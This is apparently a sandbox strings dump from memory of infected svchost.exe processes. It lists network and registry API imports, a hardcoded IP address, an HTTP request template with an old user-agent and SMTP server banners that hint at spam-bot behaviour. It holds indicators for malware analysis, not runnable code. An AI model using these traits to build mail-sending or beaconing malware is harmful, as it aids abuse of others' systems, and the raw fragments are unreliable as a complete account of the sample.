RegOpenKeyExA
ADVAPI32.dll
SHLWAPI.dll
WS2_32.dll
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
WININET.dll
GetProcessHeap
KERNEL32.dll
USER32.dll
DNSAPI.dll
GdiplusShutdown
gdiplus.dll
GDI32.dll
ole32.dll
ShellExecuteA
SHELL32.dll
GetCPInfo
J<_T>
f%fR9
Z;3*/Z%x
&EL.Gb
!"7'$%6:)* ,-./02345&(#>;=?98< 1
%System%\regedit.exe
220 Mail.Ru ESMTP
220 mx.google.com ESMTP x4si4153195bkn.47 - gsmtp
220 mx.google.com ESMTP h61si4680323qgf.97 - gsmtp
220 mx4.messagingengine.com ESMTP . No UCE permitted.
svchost.exe_2960:
.text
`.data
iphlpapi.dll
inetcomm.dll
operator
KERNEL32.DLL
kernel32.dll
mscoree.dll
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
GetProcessWindowStation
USER32.DLL
EX8^/u$9^%u
RegCloseKey
RegOpenKeyExA
ADVAPI32.dll
SHLWAPI.dll
WS2_32.dll
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
WININET.dll
GetProcessHeap
KERNEL32.dll
USER32.dll
DNSAPI.dll
GdiplusShutdown
gdiplus.dll
GDI32.dll
ole32.dll
ShellExecuteA
SHELL32.dll
GetCPInfo
?<TH>
|G9ÂY
Vc!.UY
3>&< 0&.;
-i0}|
|.Xi/
!"7'$%6:)* ,-./02345&(#>;=?98< 1
mas.lavasoft.com
%System%\regedit.exe
[184.107.38.38]
220 Mail.Ru ESMTP
220 mx.google.com ESMTP qr7si4151843bkb.78 - gsmtp
220 mx.google.com ESMTP n1si4644252qcr.19 - gsmtp
220 mx4.messagingengine.com ESMTP . No UCE permitted.
svchost.exe_1876_rwx_04000000_00008000:
.text
`.rdata
@.data
.reloc
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: %d
http://%s/
HttpSendRequestA
HttpAddRequestHeadersA
HttpOpenRequestA
InternetCrackUrlA
HttpQueryInfoA
InternetOpenUrlA
WININET.dll
WS2_32.dll
SHLWAPI.dll
KERNEL32.dll
USER32.dll
ole32.dll
zc)%c
svchost.exe_1876_rwx_13140000_01550000:
.text
`.data
iphlpapi.dll
inetcomm.dll
operator
KERNEL32.DLL
kernel32.dll
mscoree.dll
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
GetProcessWindowStation
USER32.DLL
EX8^/u$9^%u
RegCloseKey
RegOpenKeyExA
ADVAPI32.dll
SHLWAPI.dll
WS2_32.dll
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
WININET.dll
GetProcessHeap
KERNEL32.dll
USER32.dll
DNSAPI.dll
GdiplusShutdown
gdiplus.dll
GDI32.dll
ole32.dll
ShellExecuteA
SHELL32.dll
GetCPInfo
J<_T>
f%fR9
Z;3*/Z%x
&EL.Gb
!"7'$%6:)* ,-./02345&(#>;=?98< 1
%System%\regedit.exe
220 Mail.Ru ESMTP
220 mx.google.com ESMTP x4si4153195bkn.47 - gsmtp
220 mx.google.com ESMTP h61si4680323qgf.97 - gsmtp
220 mx4.messagingengine.com ESMTP . No UCE permitted.
svchost.exe_2960_rwx_04000000_00008000:
.text
`.rdata
@.data
.reloc
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: %d
http://%s/
HttpSendRequestA
HttpAddRequestHeadersA
HttpOpenRequestA
InternetCrackUrlA
HttpQueryInfoA
InternetOpenUrlA
WININET.dll
WS2_32.dll
SHLWAPI.dll
KERNEL32.dll
USER32.dll
ole32.dll
zc)%c
svchost.exe_2960_rwx_13140000_01550000:
.text
`.data
iphlpapi.dll
inetcomm.dll
operator
KERNEL32.DLL
kernel32.dll
mscoree.dll
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
GetProcessWindowStation
USER32.DLL
EX8^/u$9^%u
RegCloseKey
RegOpenKeyExA
ADVAPI32.dll
SHLWAPI.dll
WS2_32.dll
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
WININET.dll
GetProcessHeap
KERNEL32.dll
USER32.dll
DNSAPI.dll
GdiplusShutdown
gdiplus.dll
GDI32.dll
ole32.dll
ShellExecuteA
SHELL32.dll
GetCPInfo
?<TH>
|G9ÂY
Vc!.UY
3>&< 0&.;
-i0}|
|.Xi/
!"7'$%6:)* ,-./02345&(#>;=?98< 1
mas.lavasoft.com
%System%\regedit.exe
[184.107.38.38]
220 Mail.Ru ESMTP
220 mx.google.com ESMTP qr7si4151843bkb.78 - gsmtp
220 mx.google.com ESMTP n1si4644252qcr.19 - gsmtp
220 mx4.messagingengine.com ESMTP . No UCE permitted.